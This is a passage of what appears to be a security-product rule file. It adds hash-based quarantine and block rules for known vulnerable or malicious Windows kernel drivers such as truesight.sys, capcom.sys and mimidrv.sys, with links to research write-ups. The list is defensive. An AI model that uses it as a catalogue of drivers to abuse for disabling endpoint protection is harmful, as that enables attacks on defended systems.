+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978791Z",
+ "creation_date": "2026-03-23T11:45:29.978793Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59b09bd69923c0b3de3239e73205b1846a5f69043546d471b259887bb141d879",
+ "comment": "Vulnerable Kernel Driver (aka procexp152.sys) [https://www.loldrivers.io/drivers/0567c6c4-282f-406f-9369-7f876b899c25/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7c5c863-a9fb-59ba-993d-67435828a444",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160474Z",
+ "creation_date": "2026-03-23T11:45:31.160475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d13feffd9425aa1bf1cb196dd887e20f1dc46ef865584b5104595e77e71ff5c5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7dcf992-df20-5f88-9bd7-3f6c369d2abf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606978Z",
+ "creation_date": "2026-03-23T11:45:29.606980Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606985Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76adb3fa346058e95ba3fd549fd48a15adaf4920a3109391f52053ebf39e62cc",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7e088a2-9d52-5c42-98b4-d5beef625660",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983667Z",
+ "creation_date": "2026-03-23T11:45:29.983670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4dbc382c21b4b14b54d37b2fd86e12a7637f177ba4170e19ffde3584ec48e6c",
+ "comment": "Vulnerable Kernel Driver (aka amigendrv64.sys) [https://www.loldrivers.io/drivers/5c45ae9e-cb6f-4eab-a070-b0187202e080/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7e256cb-237e-5086-8d72-f1649adf06af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159972Z",
+ "creation_date": "2026-03-23T11:45:31.159974Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159980Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2268ddada0ea19902baa3b63b6912526d6217b1dd26e651208d0952439f2884",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7e6dd6b-f24c-5070-801e-a72a8291549d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491521Z",
+ "creation_date": "2026-03-23T11:45:31.491524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491532Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee277d77ba18e32ba094970f48b1e1d295a5c5f07a9a029dff6ad171dd5becb4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7e942f1-ba4b-5f0a-94d5-1f5cab2ceffa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821897Z",
+ "creation_date": "2026-03-23T11:45:30.821901Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821909Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de8a750317ff44704c0b03c374f5cbc37c9ef5c067a33628aa7c51a5b11db383",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7f56acb-6216-5897-9b9c-ab710b3baa83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828167Z",
+ "creation_date": "2026-03-23T11:45:31.828169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0506323a942dbf6d78bcc596fb20acdec525786636f3923e5c33178c5cf55cb0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f7f89e16-1b35-550a-bc81-f50fb0022f4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821343Z",
+ "creation_date": "2026-03-23T11:45:31.821346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "feec5c399ca9bb94a0592ab773bad0132d97aeed873bcb47a0622ab53c5c81b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8057b07-a2ad-53c7-b92f-9e9b95f99857",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160380Z",
+ "creation_date": "2026-03-23T11:45:31.160382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "136e3f4cf24fef00f5b7a4d35b6970dff68e4c5af40f47c0fa0d2e36f90b5d73",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f8061f08-9589-546e-bd8e-3617d60414ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479828Z",
+ "creation_date": "2026-03-23T11:45:30.479830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479835Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9e8be11a19699903016f39f95c9c5bf1a39774ecea73670f2c3ed5385ebfe4c",
+ "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f80c9f39-bf9f-5c93-8902-cb4d04b3a541",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604148Z",
+ "creation_date": "2026-03-23T11:45:29.604151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8483c5dc2323306d4ee3685b7e90a4c11e11b01d04cb607e0bc5aad368fd3c6e",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f821a02e-72e7-5e8f-93cd-e47306221281",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974950Z",
+ "creation_date": "2026-03-23T11:45:29.974953Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c1b6a278ff90171a7472423a2626edcf75233aacac1bd7d1995716ef26f8dcf",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f829a8fc-6652-5c1c-9625-de753d8e5919",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833318Z",
+ "creation_date": "2026-03-23T11:45:30.833321Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65ba545cef6077b62d96207252ffaea4e12bb93d37e5d2c2a9725fc54fb3874f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f83880bf-eb60-5877-b11b-4f07dde5b40f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492285Z",
+ "creation_date": "2026-03-23T11:45:31.492287Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492292Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fbd09c3feb1b5c77fd0aaaa3c43bf320a29a3230f1d8eaab4804d02d432e7822",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f83a7557-f594-583c-8346-4a481722d1af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147622Z",
+ "creation_date": "2026-03-23T11:45:31.147624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa8c60175aaf470608e4f198c57cf0f4deef6dd9558dd6d512ae3f71a347a11d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f852f38c-c0aa-548c-a7c0-df05a047debd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480967Z",
+ "creation_date": "2026-03-23T11:45:30.480969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c807bacfcf5c30686e26812ec8d5581a824b82fee7434260c27c33eee2dfbe2",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f86023c0-a963-5c0d-87b1-1e54a73b4f35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466720Z",
+ "creation_date": "2026-03-23T11:45:30.466723Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466732Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06ddf49ac8e06e6b83fccba1141c90ea01b65b7db592c54ffe8aa6d30a75c0b8",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f869ff1c-388e-5d6b-a145-ae2b90f72d5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608335Z",
+ "creation_date": "2026-03-23T11:45:29.608336Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608342Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3111f4d7d4fac55103453c4c8adb742def007b96b7c8ed265347df97137fbee0",
+ "comment": "Vulnerable Kernel Driver (aka EnPortv.sys) [https://www.huntress.com/blog/encase-byovd-edr-killer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f874ec6f-7cd7-53b9-a3f5-35e7df459bbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615913Z",
+ "creation_date": "2026-03-23T11:45:29.615917Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615922Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c84806a49da944c20a01e7dba7721e88859a5f65ec338ddb5da3a0d6895e7268",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f878c79e-4f66-5bb6-a30d-484b22f03095",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829519Z",
+ "creation_date": "2026-03-23T11:45:30.829521Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829526Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d128c50214a5b6c3da6c85537974ff31ef44be4bcc3cc549fb1e6986eb8bf5d2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f878d0a6-1c02-58b4-a105-3297a095e71c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147483Z",
+ "creation_date": "2026-03-23T11:45:31.147485Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147490Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0923bd21d9c36c4190536db1f8adde19161988d0a66471b002fb1b4df70fae2a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f87c4d78-9e91-5c97-b5d8-7b495888c0b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973025Z",
+ "creation_date": "2026-03-23T11:45:29.973026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
